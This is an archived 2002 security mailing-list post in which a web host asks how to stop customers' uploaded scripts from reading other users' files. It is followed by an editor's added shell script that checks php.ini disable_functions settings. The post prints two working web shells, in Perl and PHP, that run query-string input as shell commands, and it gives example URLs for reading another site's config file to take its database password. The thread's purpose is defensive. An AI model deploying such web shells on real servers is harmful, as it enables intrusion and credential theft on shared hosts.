From: § o m e 1 (some1 at runbox.com)
Date: Fri Jun 21 2002 - 21:35:05 CDT
hello
thanks for your reply William,
that's correct.. the problem is not how to protect my own script from being
subverted..
the problem is:
how to protect my hosting server..
I have a small web hosting company, and I have my own server.. I don't give
any client SSH or Telnet access; sometimes my customers upload a PHP or
Perl script or SSI files that allow them to hack "another user" on the
server..
for example:
1- a hacker wants to hack this site (www.shop.com)
first he finds out what hosting company shop.com uses
(from the DNS, for example: ns1.myHostingSite.com)
2- the hacker signs up for a $12 hosting account on my site
(www.myHostingSite.com)
after that, the hacker uploads a Perl or PHP script to his website "hack.pl
or hack.php"
example:
http://www.hackerSite.com/cgi-bin/hack.pl?cat+/home/shopcom/public_html/shop/config.php
#!/usr/bin/perl
# Runs whatever arrives in the query string as a shell command and returns
# its output; the "+" separators are turned back into spaces first.
(my $cmd = $ENV{QUERY_STRING}) =~ tr/+/ /;
print("Content-type: text/html\n\n");
print("<pre>");
print(`$cmd`);
print("</pre>");
or a hack.php
example:
http://www.hackerSite.com/hack.php?cmd=cat+/home/shopcom/public_html/shop/config.php
<?php
// Runs the value of the cmd parameter through the shell and echoes the result.
// The original relied on register_globals to populate $cmd; read it explicitly.
$cmd = $_GET['cmd'];
$output = `$cmd`;
echo $output;
?>
after that he updates his phpMyAdmin config.php file with shop.com's SQL
password and gets everything!
That is the problem
anyway: for PHP I can do some control, I edited php.ini, and I added:
disable_functions = system; exec; passthru; popen; shell_exec
I want to add the function fopen, but I can't, many scripts require that
function... guestbooks, BBs, chat scripts..
but for SSI and Perl I don't know how I can control these things..
I thought that there were some good solutions (from Apache I think) for this
kind of common security trouble for web hosting companies
----- Original Message -----
From: William Underwood
To: webappsec at securityfocus.com
Cc: moksha faced
Sent: Friday, June 21, 2002 7:06 PM
Subject: RE: WebHost Security
Replying to the list, as that is where the thread is...
moksha faced <admin at mokshafaced.com> wrote:
>If it's a 'server-wide' setting, you could set the web
>server to disallow exec statements, like the Apache
>"IncludesNOEXEC" which permits server-side includes
>but won't allow "#exec" and "#exec CGI" type
>statements.
>
>It's still always a good idea to run "perl -T" (taint
>mode) when it's a script and if you can.
>
>Does this help?
I'm sorry, but it doesn't help me at all, as I'm not the person with
the issue. Actually, I don't think it will help the OP either, as it sounds
like he's looking not for a way to prevent his own scripts from
being subverted, but rather a way to keep customers' scripts from
compromising his server.
William
-- William Underwood wllmundrwd at netscape.net
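Added example, written by the editor and not code from the thread or any of its participants: a POSIX shell check of what a php.ini disable_functions line actually disables. php.ini treats ";" as the start of a comment and "," as the list separator, so a list written with semicolons, like the one in the post above, disables only its first entry and leaves the backtick-based hack.php fully working. The two php.ini lines are constructed for the demonstration; proc_open in the corrected line is an assumption (it only exists from PHP 4.3 on), and the list of shell-spawning functions is the editor's, not the poster's.

```shell
#!/bin/sh
# Added example, not from the original thread: report what a php.ini
# "disable_functions" line really disables. php.ini treats ";" as the start
# of a comment and "," as the list separator, so a list written with ";"
# disables only its first entry.

# Constructed php.ini lines: the semicolon-separated one from the post above,
# and a comma-separated replacement. proc_open is an assumption (added in
# PHP 4.3); include whatever else your PHP build can use to spawn a shell.
INI_POSTED='disable_functions = system; exec; passthru; popen; shell_exec'
INI_FIXED='disable_functions = system, exec, passthru, popen, shell_exec, proc_open'

# PHP functions that hand a string to /bin/sh. The backtick operator is
# disabled together with shell_exec, so it needs no separate entry.
SHELL_SPAWNERS='system exec passthru popen shell_exec proc_open'

# effective_disabled LINE: print the names PHP would actually disable, one
# per line, parsing LINE the way php.ini does (comment stripped first).
effective_disabled() {
    printf '%s\n' "$1" |
        sed 's/;.*$//' |
        sed 's/^[[:space:]]*disable_functions[[:space:]]*=//' |
        tr ',' '\n' |
        sed 's/^[[:space:]]*//; s/[[:space:]]*$//' |
        grep -v '^$' || true
}

# still_allowed LINE: print the shell-spawning functions LINE leaves enabled.
still_allowed() {
    disabled=" $(effective_disabled "$1" | tr '\n' ' ') "
    for fn in $SHELL_SPAWNERS; do
        case "$disabled" in
            *" $fn "*) ;;
            *) printf '%s\n' "$fn" ;;
        esac
    done
}

for line in "$INI_POSTED" "$INI_FIXED"; do
    printf 'php.ini line : %s\n' "$line"
    printf '  disables   : %s\n' "$(effective_disabled "$line" | tr '\n' ' ')"
    printf '  still open : %s\n' "$(still_allowed "$line" | tr '\n' ' ')"
done
```

Run it with sh: the semicolon line reports only system as disabled and every other spawner still open, the comma line reports nothing still open. Disabling shell_exec is what stops the backticks in hack.php; it does nothing for Perl CGIs or SSI, which have to be handled on the Apache side (IncludesNOEXEC for SSI, as mentioned earlier in the thread, and a per-user CGI execution setup such as suEXEC for scripts).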